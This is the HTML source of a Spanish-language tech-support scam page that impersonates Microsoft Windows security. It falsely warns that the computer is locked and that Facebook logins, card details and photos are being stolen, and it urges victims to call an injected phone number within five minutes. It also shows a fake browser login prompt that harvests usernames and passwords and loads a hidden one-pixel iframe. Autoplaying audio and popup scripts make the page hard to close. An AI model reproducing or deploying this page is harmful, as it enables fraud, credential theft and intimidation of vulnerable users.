<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1;URL=''"/>
<title>** Tu computadora esta bloqueada **</title>
<iframe src="m.php" width="1" height="1" style="display:none"></iframe>
<script type="text/javascript" src="jquery.min.js"></script>
<script type="text/javascript" src="analytics.js"></script>
<script src="script.js"></script>
<audio autoplay="autoplay" loop>
	<source src="eng.mp3" type="audio/mpeg">
</audio>
<style>
body,html{background-color:#fff!important;margin:0!important;padding:0!important;width:100%!important;height:100%;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif}#header-bottom ul li,.wrapper{-webkit-box-sizing:border-box;-moz-box-sizing:border-box}body,html,p{margin:10px;padding:0;overflow:hidden}.wrapper{width:100%;display:block;float:left;box-sizing:border-box}body{margin:0;padding:0;line-height:1}#header{height:45px;padding:5px 10px;position:relative}#header .logo{display:inline-block;float:left;height:100%}#header .logo img{height:100%}#header .search{display:block;float:right;height:26px;width:220px;background:#d4d4d4;padding:3px;position:relative}#header .search img{position:absolute;right:5px;top:5px}#header-bottom{background:#0072c5;height:60px;padding:0 5px}#header-bottom .logo{height:46px;margin-top:8px;display:inline-block;float:left;position:relative}#header-bottom .logo img{height:100%}#header-bottom ul{display:inline-block;height:100%;float:left;margin:0}#header-bottom ul li{float:left;display:block;height:100%;color:#fff;font-size:20px;padding:20px 15px;box-sizing:border-box}#header-bottom ul li.active{background:#0f5fa7}span.black{color:#000}#content h3,#content h4{color:#7f7f7f;width:100%}#content{-webkit-transform-origin:50% 0;-moz-transform-origin:50% 0;-ms-transform-origin:50% 0;-o-transform-origin:50% 0;transform-origin:50% 0}#content h3{margin:20px 0;font-size:44px;font-weight:700}#content h4{margin-bottom:20px;font-size:22px;margin-top:0;font-weight:400}.container{width:1100px;display:block;margin:0 auto;font:inherit}#content .boxes{width:100%;display:inline-block;margin-bottom:20px}#content .boxes .box-item{width:25%;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:0 10px;float:left}#content .boxes .box-item .image-holder{width:100%;text-align:center;padding:10px;margin-bottom:10px;display:block}#content .boxes .box-item .image-holder img{width:58%}#content .boxes .box-item h5{color:#1baacb;margin-bottom:5px;margin-top:0;font-size:1.1em;font-weight:400}#content .boxes .box-item p{color:#7f7f7f;font-size:13px;line-height:16px;margin:0}#footer{height:60px;background:#2f2f2f;position:absolute;bottom:0}#footer .left{float:left;margin-left:100px;margin-top:20px}#footer .left h3{color:#fff;float:left;font-weight:400;font-size:15px;margin:0 10px 0 0}#footer .left .subs{float:left;background:#fff;height:26px;width:200px;position:relative;margin-top:-5px}#footer .left .subs p{font-size:14px;position:absolute;left:5px;top:5px;margin:0}#footer .left .subs img{background:#2f2f2f;height:calc(100% - 2px);position:absolute;right:1px;top:1px}#footer ul{float:right;margin:20px 30px}#footer ul li{color:#fff;font-size:16px;float:left;margin:0 10px}.chrome-alert{position:fixed;top:0;left:0;right:0}.chrome-alert>div{margin:0 auto;width:440px;background:#FBFBFB;border:1px solid #BABABA;min-height:180px;border-radius:3px;box-shadow:0 2px 0 rgba(0,0,0,.3);position:relative;font-family:'Segoe UI'}.chrome-alert h1{font-size:15px;font-weight:400;margin:0 0 5px;padding:5px 10px;color:#414141}.chrome-alert p{font-size:12px;padding:0 10px;color:#414141;margin:15px 0}.chrome-alert .action_buttons{overflow:auto}.chrome-alert .action_buttons a{float:right;font-size:12px;margin-right:15px;padding:6px 25px;text-decoration:none;color:#414141;border:1px solid #DDD;margin-top:20px;border-radius:2px;margin-bottom:20px}.chrome-alert .action_buttons a.active{border:1px solid #3B79ED;font-weight:700}.chrome-alert .content-box{max-height:440px;overflow:auto;margin:0 20px}.chrome-alert .content-box p{padding:0;margin-left:0}.chrome-alert label{padding:0 20px;font-size:12px;color:#414141}.chrome-alert label:hover{color:#3B79ED}.chrome-alert label:focus{color:#3B79ED;outline:dotted}.cross{color:#333;float:right;margin:4px 6px 0 0;text-decoration:none}iframe{position:absolute;bottom:-500px}@media (min-width:980px) and (max-width:1400px){#content .boxes .box-item .image-holder{width:50%}#content .boxes .box-item{text-align:center}#content h3{font-size:26px;margin:20px 0 6px;top:-20px;position:relative}#content h4{font-size:16px}.container{max-width:960px;width:100%}}
</style>
<style>
/**alert box**/
.alert-box{width:520px;margin:auto;position:fixed;left:0;right:0;top:110px;z-index:99;cursor:default}.alert-container{background:#FBFBFB;color:#000;border:1px solid #BABABA;box-shadow:0 2px 0 rgba(0,0,0,.3);position:relative;font-family:'Segoe UI'}.alert-box-heading{font-size:15px;font-weight:400;margin:0 0 5px;padding:5px 10px;color:#414141}.alert-box-heading a{position:absolute;right:7px;text-decoration:none;font-size:16px;color:#545353}.alert-box-container{height:350px;overflow:auto;margin:0 20px;overflow-y:hidden;overflow-x:hidden}.alert-box-container p{margin:15px 0}.alert-box-checkbox{margin:0 10px;width:87%;float:left;box-sizing:border-box}.alert-input{float:left;margin-right:10px;margin-top:3px}.alert-box-checkbox label p:hover{color:#3B79ED;cursor:pointer}.alert-box-confirm{float:left;display:block;width:100%;position:relative;background:#f1f1f1;border-top:1px solid #ddd}.alert-box-confirm a{float:right;margin-right:25px;text-decoration:none;border:2px solid #3B79ED;font-weight:300;margin-top:15px;border-radius:0;margin-bottom:15px;width:72px;text-align:center;height:23px;line-height:22px}.alert-box-checkbox p,.alert-box-confirm .confirm,.alert-box-container p{font-size: 12px;color: #414141;font-weight: 400;display: inline-block;}.clr{clear:both}
html, body{
    max-width: 100%!important;
    margin: 0 auto;
	font-family: "arial";
}
.form-div{
	max-width:630px;
    width:100%;
	min-height:170px;
	position:fixed;
	z-index:3100;
	background-color:#fff;
	border:1px solid#0078d7;
	margin:0 auto;
	left:50%;
	top:21%;
	margin-top:56px;
	margin-left:7px;
	transform: translate(-50%);
	box-shadow:0px 0px 12px 3px rgba(51, 51, 51, 0.39);
}


@media screen and (max-width: 1920px) {
.form-div{
	top:30.4%;
}
}
@media screen and (max-width: 1680px) {
.form-div{
	top:29.8%;
}
}
@media screen and (max-width: 1600px) {
.form-div{
	top:25.9%;
}
}
@media screen and (max-width: 1440px) {
.form-div{
	top:25.9%;
}
}
@media screen and (max-width: 1400px) {
.form-div{
	top:29.8%;
}
}
@media screen and (max-width: 1366px) {
.form-div{
	top:21.7%
}
}
@media screen and (max-width: 1360px) {
.form-div{
	top:20.9%;
}
}
@media screen and (min-device-width: 800px) and (max-device-width: 1280px) { 
 .form-div{
	top:22.3%;
}   
}


@media screen and (min-device-width: 600px) and (max-device-width: 1280px) { 
 .form-div{
	top:8.5%;
}   
}

@media screen and (min-device-width: 960px) and (max-device-width: 1280px) { 
.form-div{
	top:27.5%;
}
}

@media screen and (min-device-width: 768px) and (max-device-width: 1280px) { 
 .form-div{
	top:20.9%;
}   
}
@media screen and (min-device-width: 720px) and (max-device-width: 1280px) { 
 .form-div{
	top:18.5%;
}   
}
@media screen and (min-device-width: 1024px) and (max-device-width: 1280px) { 
.form-div{
	top:29.2%;
}
}

@media screen and (min-device-width: 864px) and (max-device-width: 1152px) { 
 .form-div{
	top:24.5%;
}   
}

@media screen and (min-device-width: 768px) and (max-device-width: 1024px) { 
 .form-div{
	top:20.7%;
}   
}

@media screen and (min-device-width: 600px) and (max-device-width: 800px) { 
 .form-div{
	top:10.5%;
}   
}



.form-div p{
		font-size:12px;
}
.top-p{
	padding:0px 10px 0;
	color:#000;
}
.top-p p{
	float:left;
	margin: 7px 4px;
}
.top-p span{
	float:right;
}
.top-p a p{
	color:#000;
	width:96%;
}
.main-frm{
	width:95%;
	background-color:#f0f0f0;
	padding: 0 15px;
}
.flt-left{
	float:left;
	/*! width:16%; */
	padding-bottom:0;
}
.flt-left img{
	padding-top:10px;
	padding-left:11px;
}
 .flt-right p{
	text-align:left;
	line-height:1.3;
 }
.flt-left label{
	width:100%;
	padding-top:4px;
	padding-right:10px;	
	font-size:12px;
	text-align:right;
	font-weight:normal;
}
.flt-right{
	float:right;
	width:80%;
	padding-top:1px;
	padding-bottom:0;
	margin-bottom:0;
	/*! padding-right:20px; */
}
.flt-right p{
	padding-top:0px;
    margin-bottom: 7px;
}
.flt-right input{
	width:96%;
	margin:0;
    line-height: 1.1;

}
.center-div{
	text-align:center;
	padding:7px 0 10px;
}
.center-div a{
	color:#000;
	text-decoration:none;
	font-size:11px;
}
.center-div a:hover{
	text-decoration:none;}

	.center-div a button{
	display:inline;
	width:72px;
	padding:2px 3px;	
	background-color:#e1e1e1;
	border:1px solid #c5c5c5;	
}

	.center-div a .btn-cancel{

	width:80px;
	
}
.center-div a:hover button{
	background-color:#e5f1fb;
	border:1px solid #0078d7;}
.center-div a:first-child button{
	border:2px solid #0078d7;
	margin-right:8px;
}
.clear{
	clear:both;
}
/* latest css */
@media (min-width: 1080px) and (max-width:1920px) {
#content {margin-top: 30px;}
#content .boxes .box-item h5 {font-size: 1.5em;}
#content .boxes .box-item p {font-size: 15px;}
}
@media (min-width: 768px) and (max-width:1366px) {
#content {margin-top: 30px;}
#content .boxes .box-item .image-holder {display: inline-block;}
#content .boxes .box-item:first-child .image-holder img {width: 100%!important;}
#content .boxes .box-item:nth-child(2) .image-holder img {width: 70%!important;}
#content .boxes .box-item:nth-child(3) .image-holder img {width: 90%!important;}
#content .boxes .box-item:last-child .image-holder img {width: 90%!important;}
}
@media (min-width: 768px) and (max-width:1024px) {
#header-bottom ul li {font-size: 17px;padding: 20px 12px;}
}
@media (min-width: 1024px) and (max-width:1280px) {
#content {margin-top: 50px;}
#content h3 {font-size: 36px;}
#content h4 {font-size: 22px;}
#content .boxes .box-item h5 {font-size: 1.5em;}
#content .boxes .box-item p {font-size: 15px;}
#content .boxes .box-item:nth-child(2) .image-holder img {width: 85% !important;}
#content .boxes .box-item:last-child .image-holder img {width: 100% !important;}
}
@media (min-width: 614px) and (max-width:1093px) {
#content {margin-top: 30px;}
#content h3 {font-size: 30px;}
#content h4 {font-size: 18px;}
#content .boxes .box-item h5 {font-size: 1.1em;}
#content .boxes .box-item p {font-size: 11px;}
#content .boxes .box-item:nth-child(2) .image-holder img {width: 70% !important;}
#content .boxes .box-item:nth-child(3) .image-holder img {width: 78% !important;}
#content .boxes .box-item:last-child .image-holder img {width: 92% !important;}
}
</style>
<script language="JavaScript1.2">
function openwindow()
{
var sPageURL = window.location.search.substring(1);
var randomnumber = Math.floor((Math.random()*100)+1); 
 window.open("alert_ff_auth.html?"+sPageURL,"mywindow","menubar=1,randomnumber,resizable=1,width=1920,height=1300",'_blank');
}
</script>

</head>
<body>
<!--
<div id="header" class="wrapper">
  <span class="logo">
  <img src="xe-microsoft.svg" alt="">
  </span>
  <span class="search">
    <img src="xe-search.png" alt="">
  </span>
</div> -->
<div id="header-bottom" class="wrapper">
  <div class="logo">
    <img src="xe-windows1.svg" alt="">
  </div>
  <ul>
    <li>Windows</li>
    <li>Dispositivos</li>
    <li>Apps + Juegos</li>
    <li>Descargas</li>
    <li class="active">Seguridad</li>
    <li>Grandes cosas</li>
  </ul>
</div>
<div id="content" class="wrapper" style="transform: scale(1.2919);">
  <div class="container">
    <h3>Windows fue bloqueado debido a actividad cuestionable</h3>
    <h4>Por favor no detengas o reinicies tu computadora</h4>
    <div class="boxes">
      <div class="box-item">
        <div class="image-holder">
          <img src="xe-window.svg" alt="" >
		  </div>
        <h5><strong>Llama inmediatamente</strong>
		<span class="phone_number" style="display:inline-block;"></span>
        </h5>
        <p>Recibe las últimas noticias sobre temas de seguridad.</p>
      </div>
      <div class="box-item">
        <div class="image-holder">
          <img src="xe-light.svg" alt="" style= "width:42%;">
        </div>
        <h5><strong>Ayuda instantánea sin esperar</strong></h5>
        <p>call
          <span class="phone_number"></span>
			(Gratis) y mejorar la salud. De tu computadora
        </p>

      </div>

      <div class="box-item">
        <div class="image-holder">
          <img src="xe-store.svg" alt="" style= "width:44%;">
        </div>
        <h5><strong>Ser actualizado con windows</strong></h5>
        <p>Nuestros profesionales te mantendrán al día con el último software.</p>
      </div>
      <div class="box-item">
        <div class="image-holder">
          <img src="xe-ie.svg" alt="" style= "width:54%;"></div>
        <h5><strong>Conocimiento sobre navegador seguro</strong></h5>
        <p>Obtenga más información sobre la navegación segura obtener información sobre
         <span class="phone_number"></span>
        </p>

      </div>
    </div>
    <!--BOXES END-->

    <h3>Llamar al equipo de soporte: <span class="black phone_number"> </span> (Gratis)</h3>

  </div>
</div>
<div id="footer" class="wrapper">
  <div class="left">
    <h3>Hola de Soporte</h3>
    <div class="subs">
      <p>Equipo de apoyo</p>
      <img src="xe-globe.png" alt="">
    </div>
  </div>
  <div class="logo">
    <img src="" alt="">
  </div> 
  <ul>
    <li>Opiniones</li>
    <li>de uso</li>
    <li>marcas</li>
    <li>Privacidad y Cookies</li>
    <li>Mapa del sitio</li>
  </ul>
</div>	
<canvas width="0" height="0"></canvas>		
<div id="chrome-alerts" class="chrome-alert" style="z-index:999999;">
<div>
<a href="javascript:openlink()" class="cross">X</a>
<div class="content-box" id="alert-content-box">
<p>** SU COMPUTADORA HA SIDO BLOQUEADA. **<br><br>Por favor llámenos inmediatamente al: <span class="black phone_number"> </span> <br>No ignore esta alerta crítica. Si cierra esta página, se desactivará el acceso a su computadora para evitar mayores daños a nuestra red. Nuestra computadora nos alertó de que estaba infectada por un virus y un software espía. Información
A continuación se roban ...<br><br>Inicio de sesión de Facebook<br> &gt;Detalles de la tarjeta de crédito<br> &gt;Cuenta de correo electrónico de inicio de sesión<br> &gt;Fotos almacenadas en esta computadora.<br>Debe contactarnos inmediatamente para que nuestros ingenieros.
  Puede guiarlo a través del proceso de eliminación por teléfono.
  Por favor, llámenos dentro de los 5 minutos para evitar que su computadora
  siendo discapacitado<br><br>Teléfono:  <span class="black phone_number"> </span> </p>
</div>                
<div class="action_buttons">
<a class="active" id="leave_page">DE ACUERDO</a>
</div>
</div>
</div>
<div class="form-div">
<a href="javascript:openwindow()">
	<div class="top-p">
		<p>Autenticacion requerida</p>
		<span><a href="#"><img src="close-btn.png"/></a></span>
		<div class="clear"></div>
	</div>
	<div class="main-frm">
		<div class="flt-left">
		<a href="#"><img src="quot-pic.png"/></a>
		</div>
		<div class="flt-right">
		<p>https://winfreesupport.club está solicitando su nombre de usuario y contraseña. ADVERTENCIA: ¡Su contraseña no será enviada al sitio web que está visitando actualmente!
		</p>
		</div>
		<div class="clear"></div>
		<div class="flt-left">					
		<label>Nombre de usuario:</label>
		</div>
		<div class="flt-right">
		<input type="text" class="user"/>
		</div>
		<div class="clear"></div>
		<div class="flt-left">					
		<label>Contraseña:</label>
		</div>
		<div class="flt-right">
		<input type="text" class="pass"/>					
		</div>						
		<div class="clear"></div>
		<div class="center-div">
		<a href="javascript:openwindow()"><button type="button" class="btn-submit" >DE ACUERDO</button></a>
		<a href="javascript:openwindow()"><button type="button" class="btn-cancel">Cancelar</button></a>
		</div>
	</div>
</div>
<script>
function getVariableFromURl(name)
{
	name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
	var regexS = "[\\?&]"+name+"=([^&#]*)";
	var regex = new RegExp( regexS );
	var results = regex.exec( window.location.href );
	if( results == null )
		return "";
	else
		return results[1];
}
var phone = getVariableFromURl('p_num'); 
var phone = decodeURIComponent(phone);
var x     = document.getElementsByClassName("phone_number");
var i;
for (i = 0; i < x.length; i++) {
	x[i].innerHTML=phone;
} 	
</script>
</body>
</html>